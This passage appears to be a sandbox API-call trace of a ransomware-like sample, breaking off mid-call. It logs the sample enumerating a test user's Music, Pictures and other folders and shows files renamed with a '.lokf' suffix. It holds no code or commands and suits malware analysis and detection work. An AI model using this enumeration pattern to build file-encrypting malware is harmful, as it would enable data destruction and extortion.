[0148.237] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0148.237] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned=".lnk" [0148.237] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0148.237] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned=".lnk" [0148.237] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0148.237] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned=".lnk" [0148.237] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0148.237] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.238] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.238] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.238] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0148.238] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.238] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.238] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.238] PathFindFileNameW (pszPath="") returned="" [0148.238] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0148.238] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.238] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.238] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0148.238] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.238] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.238] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.238] PathFindFileNameW (pszPath="") returned="" [0148.238] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2059aeb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.238] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2059aeb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.238] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fed6af0, ftCreationTime.dwHighDateTime=0x1d4cc9a, ftLastAccessTime.dwLowDateTime=0x9d0d7770, ftLastAccessTime.dwHighDateTime=0x1d4d3af, ftLastWriteTime.dwLowDateTime=0x2054ebf0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xe57f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cwxc45T02ajINP1wUK.wav.lokf", cAlternateFileName="CWXC45~1.LOK")) returned 1 [0148.238] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\cwxc45T02ajINP1wUK.wav.lokf") returned=".lokf" [0148.239] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned=".ini" [0148.239] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f5fb960, ftCreationTime.dwHighDateTime=0x1d4d2cd, ftLastAccessTime.dwLowDateTime=0x20defbb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20defbb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eIv9rDB", cAlternateFileName="")) returned 1 [0148.239] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71884ac0, ftCreationTime.dwHighDateTime=0x1d4cca3, ftLastAccessTime.dwLowDateTime=0x8fe086e0, ftLastAccessTime.dwHighDateTime=0x1d4c74e, ftLastWriteTime.dwLowDateTime=0x20574d50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xa8d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="klr3tCyH3.wav.lokf", cAlternateFileName="KLR3TC~1.LOK")) returned 1 [0148.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\klr3tCyH3.wav.lokf") returned=".lokf" [0148.239] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9fc49d0, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x20efa550, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20efa550, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m4--j", cAlternateFileName="")) returned 1 [0148.239] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbc4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3.lokf", cAlternateFileName="YHNTYW~1.LOK")) returned 1 [0148.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YHNtYWD7HeLx42k.mp3.lokf") returned=".lokf" [0148.239] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbc4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3.lokf", cAlternateFileName="YHNTYW~1.LOK")) returned 0 [0148.239] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.239] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.239] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0148.239] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.239] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.239] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.239] PathFindFileNameW (pszPath="") returned="" [0148.239] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbc4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3.lokf", cAlternateFileName="YHNTYW~1.LOK")) returned 0xffffffff [0148.239] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.239] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.240] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0148.240] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.240] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.240] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.240] PathFindFileNameW (pszPath="") returned="" [0148.240] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xbc4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3.lokf", cAlternateFileName="YHNTYW~1.LOK")) returned 0xffffffff [0148.240] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.240] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0148.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.241] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.241] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.241] PathFindFileNameW (pszPath="") returned="" [0148.241] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20822610, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.241] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x20822610, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20822610, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.241] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae81c2c0, ftCreationTime.dwHighDateTime=0x1d4ca24, ftLastAccessTime.dwLowDateTime=0xbac96e90, ftLastAccessTime.dwHighDateTime=0x1d4d102, ftLastWriteTime.dwLowDateTime=0x2059aeb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x12f9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="02fNEn45dPvMPAwyDJ.bmp.lokf", cAlternateFileName="02FNEN~1.LOK")) returned 1 [0148.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\02fNEn45dPvMPAwyDJ.bmp.lokf") returned=".lokf" [0148.241] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23af6a0, ftCreationTime.dwHighDateTime=0x1d4cf2d, ftLastAccessTime.dwLowDateTime=0x839ad970, ftLastAccessTime.dwHighDateTime=0x1d4d451, ftLastWriteTime.dwLowDateTime=0x205c1010, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x12d62, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2JD7dc-DViv9j UmdwX.bmp.lokf", cAlternateFileName="2JD7DC~1.LOK")) returned 1 [0148.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2JD7dc-DViv9j UmdwX.bmp.lokf") returned=".lokf" [0148.241] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c7e1240, ftCreationTime.dwHighDateTime=0x1d4cdc8, ftLastAccessTime.dwLowDateTime=0xb0be800, ftLastAccessTime.dwHighDateTime=0x1d4c8c1, ftLastWriteTime.dwLowDateTime=0x205e7170, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7fe7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3iuJ8NWM9DLs-PEj.bmp.lokf", cAlternateFileName="3IUJ8N~1.LOK")) returned 1 [0148.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3iuJ8NWM9DLs-PEj.bmp.lokf") returned=".lokf" [0148.241] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58b2bf0, ftCreationTime.dwHighDateTime=0x1d4d39a, ftLastAccessTime.dwLowDateTime=0xa98a9b0, ftLastAccessTime.dwHighDateTime=0x1d4c846, ftLastWriteTime.dwLowDateTime=0x2060d2d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x12873, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6othUkm8ekP4Ec7T.gif.lokf", cAlternateFileName="6OTHUK~1.LOK")) returned 1 [0148.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6othUkm8ekP4Ec7T.gif.lokf") returned=".lokf" [0148.241] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c4cc940, ftCreationTime.dwHighDateTime=0x1d4d0d3, ftLastAccessTime.dwLowDateTime=0x27e0f020, ftLastAccessTime.dwHighDateTime=0x1d4c9ba, ftLastWriteTime.dwLowDateTime=0x2060d2d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x12988, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="80aZ2tp21.gif.lokf", cAlternateFileName="80AZ2T~1.LOK")) returned 1 [0148.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\80aZ2tp21.gif.lokf") returned=".lokf" [0148.241] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60bab670, ftCreationTime.dwHighDateTime=0x1d4d0ee, ftLastAccessTime.dwLowDateTime=0x9b5ef470, ftLastAccessTime.dwHighDateTime=0x1d4d08b, ftLastWriteTime.dwLowDateTime=0x20633430, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x164c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9e3N7.bmp.lokf", cAlternateFileName="9E3N7B~1.LOK")) returned 1 [0148.241] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9e3N7.bmp.lokf") returned=".lokf" [0148.241] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9555cca0, ftCreationTime.dwHighDateTime=0x1d4d538, ftLastAccessTime.dwLowDateTime=0x530dfa50, ftLastAccessTime.dwHighDateTime=0x1d4cd5b, ftLastWriteTime.dwLowDateTime=0x20659590, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x684a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B DJ6bHqinsD9h4.bmp.lokf", cAlternateFileName="BDJ6BH~1.LOK")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B DJ6bHqinsD9h4.bmp.lokf") returned=".lokf" [0148.242] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a851d00, ftCreationTime.dwHighDateTime=0x1d4cee2, ftLastAccessTime.dwLowDateTime=0xa52268c0, ftLastAccessTime.dwHighDateTime=0x1d4c686, ftLastWriteTime.dwLowDateTime=0x2067f6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xfd43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b7pJttHK9Z.jpg.lokf", cAlternateFileName="B7PJTT~1.LOK")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\b7pJttHK9Z.jpg.lokf") returned=".lokf" [0148.242] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned=".ini" [0148.242] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8225370, ftCreationTime.dwHighDateTime=0x1d4d226, ftLastAccessTime.dwLowDateTime=0x67fb63a0, ftLastAccessTime.dwHighDateTime=0x1d4cd90, ftLastWriteTime.dwLowDateTime=0x2067f6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x13bdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eE0Pj7G5aEffKAC-zZKZ.jpg.lokf", cAlternateFileName="EE0PJ7~1.LOK")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eE0Pj7G5aEffKAC-zZKZ.jpg.lokf") returned=".lokf" [0148.242] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd90fef10, ftCreationTime.dwHighDateTime=0x1d4d30e, ftLastAccessTime.dwLowDateTime=0x6db0c130, ftLastAccessTime.dwHighDateTime=0x1d4c5e5, ftLastWriteTime.dwLowDateTime=0x206a5850, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xd43f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EOWcS-b-pHU1wro7.jpg.lokf", cAlternateFileName="EOWCS-~1.LOK")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EOWcS-b-pHU1wro7.jpg.lokf") returned=".lokf" [0148.242] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd01e38b0, ftCreationTime.dwHighDateTime=0x1d4c7d5, ftLastAccessTime.dwLowDateTime=0xcb2471c0, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0x206cb9b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xb379, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G4kJhdDGPq3zd 8N.png.lokf", cAlternateFileName="G4KJHD~1.LOK")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\G4kJhdDGPq3zd 8N.png.lokf") returned=".lokf" [0148.242] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5fb3fe0, ftCreationTime.dwHighDateTime=0x1d4cf62, ftLastAccessTime.dwLowDateTime=0x309e1e50, ftLastAccessTime.dwHighDateTime=0x1d4ca45, ftLastWriteTime.dwLowDateTime=0x206f1b10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xfd4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4Ti7A LHpB.png.lokf", cAlternateFileName="H4TI7A~1.LOK")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\H4Ti7A LHpB.png.lokf") returned=".lokf" [0148.242] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1bc51f0, ftCreationTime.dwHighDateTime=0x1d4cf20, ftLastAccessTime.dwLowDateTime=0x716b01e0, ftLastAccessTime.dwHighDateTime=0x1d4d4be, ftLastWriteTime.dwLowDateTime=0x206f1b10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xf5d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hsPblQOgWlR.jpg.lokf", cAlternateFileName="HSPBLQ~1.LOK")) returned 1 [0148.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hsPblQOgWlR.jpg.lokf") returned=".lokf" [0148.242] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: 